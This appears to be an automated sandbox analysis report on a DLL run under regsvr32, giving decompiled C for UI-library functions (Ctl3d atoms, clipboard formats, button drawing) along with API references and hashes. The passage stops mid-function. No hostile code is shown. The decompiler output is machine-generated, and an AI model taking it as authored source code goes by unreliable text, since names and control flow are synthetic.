Instruction Fuzzy Hash: 9D91EC71508302AFE301EF64CC89FAFB7E8FB89744F40091AF64696190DB74E942CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1002B4A0 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B4A0() {
				struct _WNDCLASSA _v56;
				signed int _t8;
				signed int _t9;
				int _t10;
				struct HINSTANCE__* _t13;
				short _t14;
				short _t15;
				short _t17;
				short _t20;
				short _t22;
				struct HDC__* _t33;
				intOrPtr* _t34;
				intOrPtr* _t44;

				EnterCriticalSection(0x10096ac0);
				_t33 = GetDC(0);
				_t8 = GetDeviceCaps(_t33, 0xc);
				_t9 = GetDeviceCaps(_t33, 0xe);
				_t10 = 1;
				if(_t8 * _t9 < 4) {
					_t10 = 0;
				}
				 *0x10096d20 = _t10;
				if(GetSystemMetrics(1) == 0x15e && GetSystemMetrics(0) == 0x280) {
					 *0x10096d20 = 0;
				}
				ReleaseDC(0, _t33);
				if( *0x10096d20 == 0) {
					L8:
					LeaveCriticalSection(0x10096ac0);
					_t13 =  *0x10096d20; // 0x0
					return _t13;
				} else {
					_t14 = GlobalAddAtomA("C3d");
					 *0x10096d28 = _t14;
					if(_t14 != 0) {
						_t15 = GlobalAddAtomA("C3dNew");
						 *0x10096d2e = _t15;
						if(_t15 == 0) {
							goto L7;
						} else {
							 *0x10096d2c = GlobalAddAtomA("C3dL");
							_t17 = GlobalAddAtomA("C3dH");
							 *0x10096d2a = _t17;
							if( *0x10096d2c == 0 || _t17 == 0) {
								 *0x10096d20 = 0;
								return 0;
							} else {
								 *0x10096d32 = GlobalAddAtomA("C3dLNew");
								_t20 = GlobalAddAtomA("C3dHNew");
								 *0x10096d30 = _t20;
								if( *0x10096d32 == 0 || _t20 == 0) {
									 *0x10096d20 = 0;
									return 0;
								} else {
									_t22 = GlobalAddAtomA("C3dD");
									 *0x10096d34 = _t22;
									if(_t22 == 0) {
										goto L7;
									} else {
										 *0x10097825 = GetSystemMetrics(0x2a);
										E1002B400();
										if(E1002B770(1) == 0) {
											goto L7;
										} else {
											_t34 = 0x10097780;
											_t44 = 0x1008271c;
											do {
												_t1 = _t44 - 0x14; // 0x10082708
												 *_t34 =  *_t44;
												_t34 = _t34 + 0x18;
												_t44 = _t44 + 0x20;
												GetClassInfoA(0, _t1,  &_v56);
												 *((intOrPtr*)(_t34 - 0x14)) = _v56.lpfnWndProc;
											} while (_t44 < 0x100827dc);
											if(GetClassInfoA(0, 0x8002,  &_v56) == 0) {
												 *0x10097810 = DefDlgProcA;
											} else {
												 *0x10097810 = _v56.lpfnWndProc;
											}
										}
									}
									goto L8;
								}
							}
						}
					} else {
						L7:
						 *0x10096d20 = 0;
						goto L8;
					}
				}
			}

0x1002b4ab
0x1002b4b9
0x1002b4c4
0x1002b4cb
0x1002b4d0
0x1002b4d8
0x1002b4da
0x1002b4da
0x1002b4e4
0x1002b4f0
0x1002b4fd
0x1002b4fd
0x1002b50a
0x1002b517
0x1002b53b
0x1002b540
0x1002b546
0x1002b551
0x1002b519
0x1002b524
0x1002b526
0x1002b52f
0x1002b557
0x1002b559
0x1002b562
0x00000000
0x1002b564
0x1002b56b
0x1002b576
0x1002b580
0x1002b586
0x1002b677
0x1002b686
0x1002b595
0x1002b59c
0x1002b5a7
0x1002b5b1
0x1002b5b7
0x1002b664
0x1002b673
0x1002b5c6
0x1002b5cb
0x1002b5cd
0x1002b5d6
0x00000000
0x1002b5dc
0x1002b5e0
0x1002b5e5
0x1002b5f6
0x00000000
0x1002b5fc
0x1002b5fc
0x1002b601
0x1002b60c
0x1002b60e
0x1002b611
0x1002b618
0x1002b61c
0x1002b621
0x1002b62d
0x1002b62d
0x1002b642
0x1002b657
0x1002b644
0x1002b648
0x1002b648
0x1002b642
0x1002b5f6
0x00000000
0x1002b5d6
0x1002b5b7
0x1002b586
0x1002b531
0x1002b531
0x1002b531
0x00000000
0x1002b531
0x1002b52f

APIs

EnterCriticalSection.KERNEL32(10096AC0,?,?,?,?,?,?,?,?,?,?,?,?,1002A957), ref: 1002B4AB
GetDC.USER32(00000000), ref: 1002B4B3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1002B4C4
GetDeviceCaps.GDI32(00000000,0000000E), ref: 1002B4CB
GetSystemMetrics.USER32 ref: 1002B4E9
GetSystemMetrics.USER32 ref: 1002B4F4
ReleaseDC.USER32(00000000,00000000), ref: 1002B50A
GlobalAddAtomA.KERNEL32(C3d), ref: 1002B524
LeaveCriticalSection.KERNEL32(10096AC0,?,?,?,?,?,?,?,?,?,?,?,?,1002A957), ref: 1002B540
GlobalAddAtomA.KERNEL32(C3dNew), ref: 1002B557
GlobalAddAtomA.KERNEL32(C3dL), ref: 1002B569
GlobalAddAtomA.KERNEL32(C3dH), ref: 1002B576
GlobalAddAtomA.KERNEL32(C3dLNew), ref: 1002B59A
GlobalAddAtomA.KERNEL32(C3dHNew), ref: 1002B5A7
GlobalAddAtomA.KERNEL32(C3dD), ref: 1002B5CB
GetSystemMetrics.USER32 ref: 1002B5DE
GetClassInfoA.USER32(00000000,10082708,?), ref: 1002B621
GetClassInfoA.USER32(00000000,00008002,?), ref: 1002B63E

Strings

C3dL, xrefs: 1002B564
C3dHNew, xrefs: 1002B5A2
C3dD, xrefs: 1002B5C6
C3d, xrefs: 1002B519
C3dNew, xrefs: 1002B552
C3dLNew, xrefs: 1002B595
C3dH, xrefs: 1002B571

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
API String ID: 1233821986-3277416593
Opcode ID: 0e7761b3dabde18a4fef0f0fb4c1d719aa29e7b5763aa1c34622b822d139c7e8
Instruction ID: 469bcc2b4fc8fd2791d4aa69e500938a7836ec3701b77fdddaa28bf4d24fa621
Opcode Fuzzy Hash: 0e7761b3dabde18a4fef0f0fb4c1d719aa29e7b5763aa1c34622b822d139c7e8
Instruction Fuzzy Hash: 13411835E01B25AAF708EB68DCC4B997BE4FB4C380F810417E91C973A0DB759945CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 10066829 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10066829() {

				 *0x10094ee8 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(0x10094eec)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(0x10094ef0)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(0x10094ef4)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(0x10094ef8)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(0x10094efc)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(0x10094f00)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(0x10094f04)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(0x10094f08)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(0x10094f0c)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(0x10094f10)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(0x10094f14)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return 0x10094ee8;
			}

0x1006684e
0x10066857
0x10066861
0x1006686b
0x10066875
0x1006687f
0x10066889
0x10066893
0x1006689d
0x100668a7
0x100668b1
0x100668b6
0x100668bd

APIs

RegisterClipboardFormatA.USER32(Native), ref: 10066847
RegisterClipboardFormatA.USER32(OwnerLink), ref: 10066850
RegisterClipboardFormatA.USER32(ObjectLink), ref: 1006685A
RegisterClipboardFormatA.USER32(Embedded Object), ref: 10066864
RegisterClipboardFormatA.USER32(Embed Source), ref: 1006686E
RegisterClipboardFormatA.USER32(Link Source), ref: 10066878
RegisterClipboardFormatA.USER32(Object Descriptor), ref: 10066882
RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1006688C
RegisterClipboardFormatA.USER32(FileName), ref: 10066896
RegisterClipboardFormatA.USER32(FileNameW), ref: 100668A0
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 100668AA
RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 100668B4

Strings

Embedded Object, xrefs: 1006685C
FileNameW, xrefs: 10066898
FileName, xrefs: 1006688E
Link Source, xrefs: 10066870
Native, xrefs: 10066842
Embed Source, xrefs: 10066866
Object Descriptor, xrefs: 1006687A
OwnerLink, xrefs: 10066849
RichEdit Text and Objects, xrefs: 100668AC
Rich Text Format, xrefs: 100668A2
Link Source Descriptor, xrefs: 10066884
ObjectLink, xrefs: 10066852

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: a6f11ba92a7008f507ab17157d783d2670cf0230451df3f0f1386ed746547147
Instruction ID: 6edad5e9e3dfb4dc953ce5c61fd8a77399e99d685278f62d4035cdb73707665b
Opcode Fuzzy Hash: a6f11ba92a7008f507ab17157d783d2670cf0230451df3f0f1386ed746547147
Instruction Fuzzy Hash: FC017974D047885AC774EF769C08C6BBEE4EED4610352892EE1D587610EB389405CF89

Uniqueness

Uniqueness Score: -1.00%

Function 1002C270 Relevance: 37.8, APIs: 25, Instructions: 294
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002C270(void* __eflags) {
				void* _t113;
				void* _t121;
				intOrPtr _t142;
				struct tagRECT _t144;
				int _t147;
				struct tagRECT _t158;
				intOrPtr _t160;
				long _t161;
				void* _t163;
				struct tagRECT* _t178;
				signed int _t180;
				int _t182;
				CHAR* _t183;
				long* _t184;
				intOrPtr _t194;
				struct tagRECT _t195;
				struct tagRECT _t198;
				intOrPtr _t199;
				int _t206;
				RECT* _t209;
				struct HDC__* _t210;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;

				_t184 = _t214 + 0xc;
				_t209 =  *(_t214 + 0x34);
				_t180 = _t209->right;
				_push(0xf);
				_push(7);
				 *_t184 = _t209->left;
				_t210 =  *(_t214 + 0x40);
				_t184[1] = _t209->top;
				_t184[2] = _t180;
				_t184[3] = _t209->bottom;
				E1002A670(_t210, _t209, 7);
				_t215 = _t214 + 0x14;
				InflateRect(_t214 + 0x30, 0xffffffff, 0xffffffff);
				if( *((short*)(_t215 + 0x44)) == 1 && IsWindowEnabled( *(_t215 + 0x30)) != 0) {
					_push(0xf);
					_push(7);
					E1002A670(_t210, _t215 + 0x1c, 7);
					_t178 = _t215 + 0x30;
					_t215 = _t215 + 0x14;
					InflateRect(_t178, 0xffffffff, 0xffffffff);
				}
				PatBlt(_t210, _t209->left, _t209->top, 1, 1, 0xf00021);
				PatBlt(_t210, _t209->right - 1, _t209->top, 1, 1, 0xf00021);
				PatBlt(_t210,  *_t209, _t209->bottom - 1, 1, 1, 0xf00021);
				PatBlt(_t210, _t209->right - 1, _t209->bottom - 1, 1, 1, 0xf00021);
				asm("sbb ebx, ebx");
				_t182 =  ~_t180 + 1;
				if( *((intOrPtr*)(_t215 + 0x48)) == 0) {
					_t113 =  *0x10096d64; // 0x0
				} else {
					_t113 =  *0x10096d6c; // 0x0
				}
				 *((intOrPtr*)(_t215 + 0x14)) = SelectObject(_t210, _t113);
				PatBlt(_t210,  *(_t215 + 0x20),  *(_t215 + 0x20), _t182,  *((intOrPtr*)(_t215 + 0x2c)) -  *(_t215 + 0x24), 0xf00021);
				PatBlt(_t210,  *(_t215 + 0x28),  *(_t215 + 0x28),  *(_t215 + 0x24) -  *(_t215 + 0x20), _t182, 0xf00021);
				if( *((intOrPtr*)(_t215 + 0x48)) == 0) {
					_t163 =  *0x10096d6c; // 0x0
					_t213 = 0;
					SelectObject(_t210, _t163);
					 *(_t215 + 0x28) =  *(_t215 + 0x28) - 1;
					 *(_t215 + 0x24) =  *(_t215 + 0x24) - 1;
					if(_t182 > 0) {
						do {
							PatBlt(_t210,  *(_t215 + 0x24),  *(_t215 + 0x30),  *(_t215 + 0x24) -  *(_t215 + 0x20) + 1, 1, 0xf00021);
							PatBlt(_t210,  *(_t215 + 0x28),  *(_t215 + 0x24), 1,  *(_t215 + 0x28) -  *(_t215 + 0x24), 0xf00021);
							if(_t182 - 1 > _t213) {
								InflateRect(_t215 + 0x1c, 0xffffffff, 0xffffffff);
							}
							_t213 = _t213 + 1;
						} while (_t182 > _t213);
					}
				}
				_t121 =  *0x10096d68; // 0x0
				 *(_t215 + 0x1c) =  *(_t215 + 0x1c) + 1;
				 *(_t215 + 0x20) =  *(_t215 + 0x20) + 1;
				SelectObject(_t210, _t121);
				_t206 =  *(_t215 + 0x20);
				PatBlt(_t210, _t206,  *(_t215 + 0x24),  *((intOrPtr*)(_t215 + 0x2c)) -  *(_t215 + 0x24),  *(_t215 + 0x28) -  *(_t215 + 0x24), 0xf00021);
				if(IsWindowEnabled( *(_t215 + 0x30)) == 0) {
					_t161 =  *0x10096d5c; // 0x0
					SetTextColor(_t210, _t161);
				}
				_t183 =  *(_t215 + 0x3c);
				_push(_t215 + 0x18);
				_push(_t215 + 0x14);
				E1002A860(_t210, _t183);
				_t216 = _t215 + 0x10;
				asm("cdq");
				 *((intOrPtr*)(_t216 + 0x20)) =  *((intOrPtr*)(_t216 + 0x20)) + ( *((intOrPtr*)(_t215 + 0x38)) -  *(_t215 + 0x30) -  *(_t215 + 0x28) - _t206 >> 1);
				_t194 =  *((intOrPtr*)(_t216 + 0x28));
				asm("cdq");
				 *(_t216 + 0x1c) =  *(_t216 + 0x1c) + ( *(_t216 + 0x24) -  *(_t216 + 0x1c) -  *((intOrPtr*)(_t216 + 0x14)) - _t206 >> 1);
				_t142 =  *((intOrPtr*)(_t216 + 0x20)) +  *((intOrPtr*)(_t216 + 0x18));
				if(_t142 >= _t194) {
					_t142 = _t194;
				}
				_t195 =  *(_t216 + 0x24);
				 *((intOrPtr*)(_t216 + 0x28)) = _t142;
				_t144 =  *(_t216 + 0x1c) +  *((intOrPtr*)(_t216 + 0x14));
				if(_t144 >= _t195) {
					_t144 = _t195;
				}
				 *(_t216 + 0x24) = _t144;
				if( *((intOrPtr*)(_t216 + 0x48)) != 0) {
					OffsetRect(_t216 + 0x1c, 1, 1);
					_t198 =  *(_t216 + 0x24);
					_t158 = _t209->right - 3;
					if(_t158 >= _t198) {
						_t158 = _t198;
					}
					_t199 =  *((intOrPtr*)(_t216 + 0x28));
					 *(_t216 + 0x24) = _t158;
					_t160 = _t209->bottom - 3;
					if(_t160 >= _t199) {
						_t160 = _t199;
					}
					 *((intOrPtr*)(_t216 + 0x28)) = _t160;
				}
				DrawTextA(_t210, _t183,  *(_t216 + 0x44), _t216 + 0x1c, 0x20);
				_t147 = GetFocus();
				if(_t147 ==  *((intOrPtr*)(_t216 + 0x30))) {
					InflateRect(_t216 + 0x1c, 1, 1);
					IntersectRect(_t216 + 0x24, _t216 + 0x1c, _t209);
					_t147 = DrawFocusRect(_t210, _t216 + 0x1c);
				}
				if( *(_t216 + 0x10) != 0) {
					return SelectObject(_t210,  *(_t216 + 0x10));
				}
				return _t147;
			}

0x1002c273
0x1002c27a
0x1002c284
0x1002c287
0x1002c289
0x1002c28b
0x1002c292
0x1002c298
0x1002c29b
0x1002c29e
0x1002c2a1
0x1002c2aa
0x1002c2b2
0x1002c2be
0x1002c2d3
0x1002c2d5
0x1002c2db
0x1002c2e0
0x1002c2e4
0x1002c2ec
0x1002c2ec
0x1002c303
0x1002c31c
0x1002c334
0x1002c34e
0x1002c359
0x1002c35d
0x1002c363
0x1002c36c
0x1002c365
0x1002c365
0x1002c365
0x1002c386
0x1002c397
0x1002c3b7
0x1002c3c2
0x1002c3c4
0x1002c3c9
0x1002c3cd
0x1002c3d3
0x1002c3d7
0x1002c3dd
0x1002c3df
0x1002c3fb
0x1002c41c
0x1002c427
0x1002c432
0x1002c432
0x1002c438
0x1002c439
0x1002c3df
0x1002c3dd
0x1002c43d
0x1002c442
0x1002c446
0x1002c44c
0x1002c463
0x1002c474
0x1002c487
0x1002c489
0x1002c490
0x1002c490
0x1002c49e
0x1002c4a2
0x1002c4a3
0x1002c4a6
0x1002c4b7
0x1002c4ba
0x1002c4c0
0x1002c4d0
0x1002c4d4
0x1002c4da
0x1002c4e2
0x1002c4e8
0x1002c4ea
0x1002c4ea
0x1002c4ec
0x1002c4f0
0x1002c4f8
0x1002c4fe
0x1002c500
0x1002c500
0x1002c507
0x1002c50b
0x1002c51c
0x1002c521
0x1002c525
0x1002c52a
0x1002c52c
0x1002c52c
0x1002c52e
0x1002c532
0x1002c539
0x1002c53e
0x1002c540
0x1002c540
0x1002c542
0x1002c542
0x1002c554
0x1002c560
0x1002c566
0x1002c571
0x1002c582
0x1002c58e
0x1002c58e
0x1002c599
0x00000000
0x1002c5a1
0x1002c5ae

APIs

Part of subcall function 1002A670: SetBkColor.GDI32(?), ref: 1002A68D
Part of subcall function 1002A670: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A6DA
Part of subcall function 1002A670: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A709
Part of subcall function 1002A670: SetBkColor.GDI32(?,?), ref: 1002A727
Part of subcall function 1002A670: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A752
Part of subcall function 1002A670: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1002A78C

InflateRect.USER32 ref: 1002C2B2
IsWindowEnabled.USER32(?), ref: 1002C2C5
InflateRect.USER32 ref: 1002C2EC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C303
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C31C
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C334
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C34E
SelectObject.GDI32(?,00000000), ref: 1002C373
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 1002C397
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 1002C3B7
SelectObject.GDI32(?,00000000), ref: 1002C3CD
PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 1002C3FB
PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 1002C41C
InflateRect.USER32 ref: 1002C432
SelectObject.GDI32(?,00000000), ref: 1002C44C
PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 1002C474
IsWindowEnabled.USER32(?), ref: 1002C47F
SetTextColor.GDI32(?,00000000), ref: 1002C490
OffsetRect.USER32 ref: 1002C51C

Part of subcall function 1002A670: SetBkColor.GDI32(?,00000000), ref: 1002A794

DrawTextA.USER32(?,?,?,?,00000020), ref: 1002C554
GetFocus.USER32 ref: 1002C560
InflateRect.USER32 ref: 1002C571
IntersectRect.USER32(?,?,?), ref: 1002C582
DrawFocusRect.USER32 ref: 1002C58E
SelectObject.GDI32(?,00000000), ref: 1002C5A1

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
String ID:
API String ID: 1611134597-0
Opcode ID: 0b00c7aa80fd70ec1e844ac35584477eea331bcf4961f2b79728767456c4b7d9
Instruction ID: 85959a83d7433ca628b836921f572efc8fc11a901b559a9b083272c360fdd131
Opcode Fuzzy Hash: 0b00c7aa80fd70ec1e844ac35584477eea331bcf4961f2b79728767456c4b7d9
Instruction Fuzzy Hash: E3B11B71208316AFE304DFA8CD85E6BB7E8FB88714F404A0DF559D6290D7B1EA45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10065E3F Relevance: 35.3, APIs: 4, Strings: 16, Instructions: 341
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10065E3F(void* __ecx, void* __edi) {
				void* __ebx;
				void* __esi;
				char* _t131;
				intOrPtr* _t135;
				void* _t137;
				char* _t146;
				intOrPtr _t164;
				char* _t171;
				long _t174;
				intOrPtr _t190;
				intOrPtr _t193;
				char* _t204;
				void* _t242;
				intOrPtr* _t258;
				void* _t261;
				struct HICON__* _t263;
				char* _t264;
				char* _t265;
				void* _t268;
				void* _t269;
				void* _t271;
				void* _t272;

				E1001A9E0(0x10077964, _t269);
				_t272 = _t271 - 0x34;
				_t131 =  *0x1008f630; // 0x1008f644
				_t261 = __ecx;
				 *(_t269 - 0x30) = _t131;
				 *(_t269 - 0x14) = _t131;
				 *(_t269 - 4) = 0;
				 *(_t269 - 4) = 1;
				E10048C6C(_t261,  *(E10064B8B() + 8), _t269 - 0x30);
				_t135 =  *((intOrPtr*)(_t261 + 8));
				 *(_t269 - 0x38) = 1;
				if(_t135 == 0) {
					L40:
					 *(_t269 - 4) = 0;
					E1004591E(_t269 - 0x14);
					 *(_t269 - 4) =  *(_t269 - 4) | 0xffffffff;
					_t137 = E1004591E(_t269 - 0x30);
					 *[fs:0x0] =  *((intOrPtr*)(_t269 - 0xc));
					return _t137;
				}
				while(1) {
					_t258 =  *((intOrPtr*)(_t135 + 8));
					 *((intOrPtr*)(_t269 - 0x3c)) =  *_t135;
					E10045693(_t269 - 0x1c, _t269 - 0x30);
					 *(_t269 - 4) = 2;
					E10045693(_t269 - 0x28, _t269 - 0x30);
					 *(_t269 - 4) = 3;
					E10045693(_t269 - 0x24, _t269 - 0x30);
					 *(_t269 - 4) = 4;
					E10045693(_t269 - 0x2c, _t269 - 0x30);
					if( *((intOrPtr*)(_t269 + 8)) != 0) {
						_t204 =  *0x1008f630; // 0x1008f644
						 *(_t269 - 0x34) = _t204;
						 *(_t269 - 4) = 6;
						_t263 = ExtractIconA( *(E10064B8B() + 8),  *(_t269 - 0x30),  *(_t269 - 0x38));
						if(_t263 == 0) {
							E10037011(_t269 - 0x34, ",%d", 0);
							_t272 = _t272 + 0xc;
						} else {
							E10037011(_t269 - 0x34, ",%d",  *(_t269 - 0x38));
							_t272 = _t272 + 0xc;
							DestroyIcon(_t263);
						}
						E10045D36(_t269 - 0x2c, _t269 - 0x34);
						 *(_t269 - 4) = 5;
						E1004591E(_t269 - 0x34);
					}
					_t146 =  *0x1008f630; // 0x1008f644
					 *(_t269 - 0x18) = _t146;
					 *(_t269 - 0x10) = _t146;
					 *(_t269 - 0x20) = _t146;
					_push(5);
					_push(_t269 - 0x10);
					 *(_t269 - 4) = 9;
					if( *((intOrPtr*)( *_t258 + 0x64))() == 0 ||  *((intOrPtr*)( *(_t269 - 0x10) - 8)) == 0) {
						goto L38;
					}
					_push(6);
					_push(_t269 - 0x20);
					if( *((intOrPtr*)( *_t258 + 0x64))() == 0) {
						E10045A57(0, _t269 - 0x20, _t269, _t269 - 0x10);
					}
					if(E10065B07( *(_t269 - 0x10),  *(_t269 - 0x20), 0) != 0) {
						if( *((intOrPtr*)(_t269 + 8)) == 0) {
							L15:
							_push(0);
							_push(_t269 - 0x14);
